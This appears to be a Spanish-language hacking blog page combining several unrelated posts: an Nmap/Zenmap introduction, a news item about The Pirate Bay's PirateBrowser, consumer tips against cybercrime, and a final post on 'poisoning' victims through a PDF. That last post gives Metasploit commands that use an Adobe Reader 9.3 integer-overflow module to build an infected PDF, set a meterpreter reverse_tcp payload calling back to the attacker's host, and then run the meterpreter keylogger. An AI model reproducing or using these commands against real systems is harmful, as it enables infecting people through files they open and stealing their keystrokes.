Mapeo de Redes con Zenmap





Nmap (“mapeador de redes”) es una herramienta de código abierto para exploración de red y auditoría de seguridad. Se diseñó para analizar rápidamente grandes redes, aunque funciona muy bien contra equipos individuales. Nmap utiliza paquetes IP "crudos" («raw»,N. del T.) en formas originales para determinar qué equipos se encuentran disponibles en una red, qué servicios (nombre y versión de la aplicación) ofrecen, qué sistemas operativos (y sus versiones) ejecutan, qué tipo de filtros de paquetes o cortafuegos se están utilizando así como docenas de otras características. Aunque generalmente se utiliza Nmap en auditorías de seguridad, muchos administradores de redes y sistemas lo encuentran útil para realizar tareas rutinarias, como puede ser el inventariado de la red, la planificación de actualización de servicios y la monitorización del tiempo que los equipos o servicios se mantiene activos.

Primero al instalar nmap nos viene con una serie de paquetes herramientas, desarrolladas por el mismo creador de Nmap Fyodor Gordon Lyon las cuales anda reviviendo a algunas tools ya viejas dejadas en el olvido las cuales son:

•Zenmap
•Ndiff
•NPing
•Ncrack
•Ncat

Zenmap:


Zenmap es la interfaz grafica de Nmap, la cual tiene una integracion de lo que es nmap y algunas herramientas que integra en si mismo la verdad acelera el proceso de un pentesting ya que los comandos y demas vienen definidos evitando errores tipográficos.





Descargar Manual:


PirateBrowser .onion es el buscador de Pirate Bay







The Pirate Baylanzó este fin de semana el PirateBrowser, un navegador propio que se salta bloqueos regionales. The Pirate Bay, es uno de los sitios web más bloqueado por órdenes de tribunalesya que se utiliza para compartir y descargar archivos que muchas veces violan los derechos de autor.

El PirateBrowser permite a la gente pasar por alto estas restricciones y en tres días más de 100.000 personas han descargador el navegador a través del enlace directo. De hecho, 5.000 personas compartieron el archivo justo en el momento de su publicación., según reporta Torrentfreak.com



«No pensé que sería descargado a esta velocidad. Supongo que las personas quieren ver los sitios web que sus gobiernos y tribunales les están tratando de esconder», ha dicho Winston de The Pirate Bay a TorrentFreak.

Tal ha sido lo inesperado de la situación que para poder hacer frente a la demanda, The Pirate Bay tuvo que actualizar la conexión para el enlace de descarga. Incluso después de tres días el PirateBrowser recibe unas mil descargas por hora.

El navegador está basado en Firefox 23 y aliado con un cliente Tor. Su objetivo es eludir la censura, pero los equipos Pirate Bay quiere reiterar que no se proporciona anonimato a sus usuarios.



«No es que proporciona el anonimato y no está seguro a ocultar su identidad. PirateBrowser sólo se supone eludir la censura y el bloqueo de sitios web. Si hacemos un navegador totalmente anónimo esto sólo lo va a ralentizar», ha explicado.

Actualmente están trabajando en una aplicación BitTorrent con una potencia especial que permite a los usuarios almacenar y distribuir The Pirate Bay y otros sitios web en sus propios equipos, por lo que es poco probable que terceras partes a lo bloqueen.

Descargar:

http://piratebrowser.com/

5 maneras de ser protegidos de Delitos Cibernéticos




Ciberdelincuencia, también conocida como la delincuencia informática, es un momento de la actividad criminal que ocurre con un ordenador o Internet. Estos delitos pueden ser devastadores y causar un gran daño a la víctima, los tipos de delitos cibernéticos incluyen pornografía infantil, violación de copyright, las estafas de phishing y el fraude o robo de identidad. Aún más graves delitos cibernéticos potenciales incluyen ciber terrorismo y la guerra cibernética, los cuales son cada vez más común tras el aumento del uso mundial de Internet. Para protegerse y evitar convertirse en una víctima de los efectos devastadores de los delitos informáticos, siga las 5 maneras de ser protegidos de Delitos Cibernéticos que figuran a continuación.






1. Tenga cuidado al navegar por la web. Eso significa que si usted hace compras en línea, comprar sólo en sitios web en los que confía sea seguro o han tenido numerosas experiencias. Si usted nunca ha oído hablar o interactuado con un sitio web en particular, asegúrese de hacer su investigación de antemano para determinar su credibilidad. Entrando su información personal en un sitio web sin protección o fraudulenta puede tener consecuencias desastrosas que se pueden evitar fácilmente permanecer alerta.

2. Incluso la mejor protección cibernética puede fallar, por lo que es importante que controle periódicamente sus estados financieros, para asegurarse de que no es una víctima de actividades fraudulentas. Si ve algo sospechoso o ir fuera de lo común en tu cuenta, puede ponerse en contacto con su banco y tomar medidas para garantizar que no vuelva a suceder.

3. Esto puede parecer como un hecho, pero el uso de software anti-virus en su computadora para protegerse contra el delito cibernético. Este software puede ser un fuerte elemento de disuasión ante cualquier estafa o virus. Todo el mundo debería invertir en un buen software, no importa cuán inmune a los virus que usted cree que su equipo está. Software antivirus decente le puede ahorrar un montón de problemas y preocupaciones. No cometa el error de pensar que sólo porque usted tiene un iMac significa que usted es inmune a los virus, mientras que son menos de un objetivo, siguen siendo vulnerables a los delincuentes cibernéticos.


4. Tómese su tiempo para pensar contraseñas seguras para usar para cosas importantes como el registro en su computadora y Smartphone, o ver la información confidencial, como su cuenta bancaria. Esto puede parecer obvio, pero el número de personas que han hackeado su cuenta es una advertencia para que sólo las contraseñas más fuertes pueden resistir entrada. Trate de hacer que su contraseña complicada y comprensible sólo a usted, con al menos ocho caracteres o más. Es posible que su contraseña sea simple y fácil de recordar, pero no elige nada demasiado obvio o puede llegar a arrepentir.

5. Otra forma de protegerse contra la ciberdelincuencia es utilizar diferentes contraseñas para diferentes cuentas. No es una buena idea usar una contraseña común para todo, una vez que un hacker se entera, va a ser una tarea relativamente sencilla para cometer delitos como el robo de identidad. Si recordar demasiadas contraseñas resulta difícil, trate de usar pequeñas variaciones de la misma contraseña.

Envenenar por pdf +keylogger




Las versiones afectadas:
Adobe Reader 9.3 y versiones anteriores para Windows, Macintosh y UNIX
Adobe Acrobat 9.3 y versiones anteriores para Windows y Macintosh

Probado en Windows XP SP3 con Adobe Reader 9.3.0




Descripción:

Este módulo explota una vulnerabilidad de desbordamiento de enteros en Adobe Reader y Adobe Acrobat versiones Professional 8.0 por 8.2 y 9.0 a 9.3.
Hice un video demo como se explota dicho exploit abajo estan los comando que se utilizan en una breve explicación se crea un archivo pdf infectado que afecta las versiones de adobe reader 8,9,9.3 y anteriores para arrancar una sesión de meterpreter y se ve como se utiliza el keylogger que trae el meterpreter.





Descargar video original



Código:
use windows/fileformat/adobe_libtiff
set filename rhinestonehack.pdf
set outputpath /root/Desktop
set payload windows/meterpreter/reverse_tcp
set LHOST (mi ip)
set LPORT 4444